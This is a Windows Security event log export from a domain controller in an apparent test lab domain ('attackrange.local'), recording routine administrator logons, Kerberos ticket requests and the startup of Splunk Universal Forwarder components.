ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258121
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57910B

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=258120
Keywords=Audit Success
Message=Special privileges assigned to new logon.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57910B

Privileges:		SeSecurityPrivilege
			SeTakeOwnershipPrivilege
			SeLoadDriverPrivilege
			SeBackupPrivilege
			SeRestorePrivilege
			SeDebugPrivilege
			SeSystemEnvironmentPrivilege
			SeEnableDelegationPrivilege
			SeImpersonatePrivilege
			SeDelegateSessionUserImpersonatePrivilege
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258119
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57910B
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{340486D4-536D-DCF9-E6F4-9F3FBAC11908}

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Workstation Name:	WIN-DC-725
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		Advapi  
	Authentication Package:	Negotiate
	Transited Services:	-
	Package Name (NTLM only):	-
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.

The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.

The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).

The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.

The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.

The impersonation level field indicates the extent to which a process in the logon session can impersonate.

The authentication information fields provide detailed information about this specific logon request.
	- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
	- Transited services indicate which intermediate services have participated in this logon request.
	- Package name indicates which sub-protocol was used among the NTLM protocols.
	- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258118
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Account Whose Credentials Were Used:
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon GUID:		{340486D4-536D-DCF9-E6F4-9F3FBAC11908}

Target Server:
	Target Server Name:	localhost
	Additional Information:	localhost

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Network Address:	-
	Port:			-

This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4769
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Service Ticket Operations
OpCode=Info
RecordNumber=258117
Keywords=Audit Success
Message=A Kerberos service ticket was requested.

Account Information:
	Account Name:		Administrator@ATTACKRANGE.LOCAL
	Account Domain:		ATTACKRANGE.LOCAL
	Logon GUID:		{340486D4-536D-DCF9-E6F4-9F3FBAC11908}

Service Information:
	Service Name:		WIN-DC-725$
	Service ID:		ATTACKRANGE\WIN-DC-725$

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810000
	Ticket Encryption Type:	0x12
	Failure Code:		0x0
	Transited Services:	-

This event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.

This event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.

Ticket options, encryption types, and failure codes are defined in RFC 4120.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4768
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Authentication Service
OpCode=Info
RecordNumber=258116
Keywords=Audit Success
Message=A Kerberos authentication ticket (TGT) was requested.

Account Information:
	Account Name:		Administrator
	Supplied Realm Name:	ATTACKRANGE
	User ID:			ATTACKRANGE\Administrator

Service Information:
	Service Name:		krbtgt
	Service ID:		ATTACKRANGE\krbtgt

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810010
	Result Code:		0x0
	Ticket Encryption Type:	0x12
	Pre-Authentication Type:	2

Certificate Information:
	Certificate Issuer Name:		
	Certificate Serial Number:	
	Certificate Thumbprint:		

Certificate information is only provided if a certificate was used for pre-authentication.

Pre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258115
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x574157

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258114
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x573406

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258113
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x571336

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:35 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258132
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x579A27

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:35 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258131
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE.LOCAL
	Logon ID:		0x579A27
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{DAECB7E0-948F-3A21-8C1A-BE4746E3A7F7}

Process Information:
	Process ID:		0x0
	Process Name:		-

Network Information:
	Workstation Name:	-
	Source Network Address:	::1
	Source Port:		50986

Detailed Authentication Information:
	Logon Process:		Kerberos
	Authentication Package:	Kerberos
	Transited Services:	-
	Package Name (NTLM only):	-
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.

The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.

The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).

The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.

The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.

The impersonation level field indicates the extent to which a process in the logon session can impersonate.

The authentication information fields provide detailed information about this specific logon request.
	- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
	- Transited services indicate which intermediate services have participated in this logon request.
	- Package name indicates which sub-protocol was used among the NTLM protocols.
	- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
03/12/2021 10:48:35 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=258130
Keywords=Audit Success
Message=Special privileges assigned to new logon.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x579A27

Privileges:		SeSecurityPrivilege
			SeBackupPrivilege
			SeRestorePrivilege
			SeTakeOwnershipPrivilege
			SeDebugPrivilege
			SeSystemEnvironmentPrivilege
			SeLoadDriverPrivilege
			SeImpersonatePrivilege
			SeDelegateSessionUserImpersonatePrivilege
			SeEnableDelegationPrivilege
03/12/2021 10:48:43 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258133
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x474
	New Process Name:	C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\System Mandatory Level
	Creator Process ID:	0x1334
	Creator Process Name:	C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
	Process Command Line:	"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258135
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x10c0
	New Process Name:	C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\System Mandatory Level
	Creator Process ID:	0x1334
	Creator Process Name:	C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
	Process Command Line:	"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258134
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x5c0
	New Process Name:	C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\System Mandatory Level
	Creator Process ID:	0x1334
	Creator Process Name:	C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
	Process Command Line:	"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:46 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258136
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x6e8
	New Process Name:	C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\System Mandatory Level
	Creator Process ID:	0x1334
	Creator Process Name:	C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
	Process Command Line:	"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:47 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258138
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x110c
	New Process Name:	C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\System Mandatory Level
	Creator Process ID:	0x1334
	Creator Process Name:	C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
	Process Command Line:	"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:47 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258137
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xc0c
	New Process Name:	C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\System Mandatory Level
	Creator Process ID:	0x1334
	Creator Process Name:	C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
	Process Command Line:	"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:48 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258139
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1218
	New Process Name:	C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\System Mandatory Level
	Creator Process ID:	0x1334
	Creator Process Name:	C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
	Process Command Line:	"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
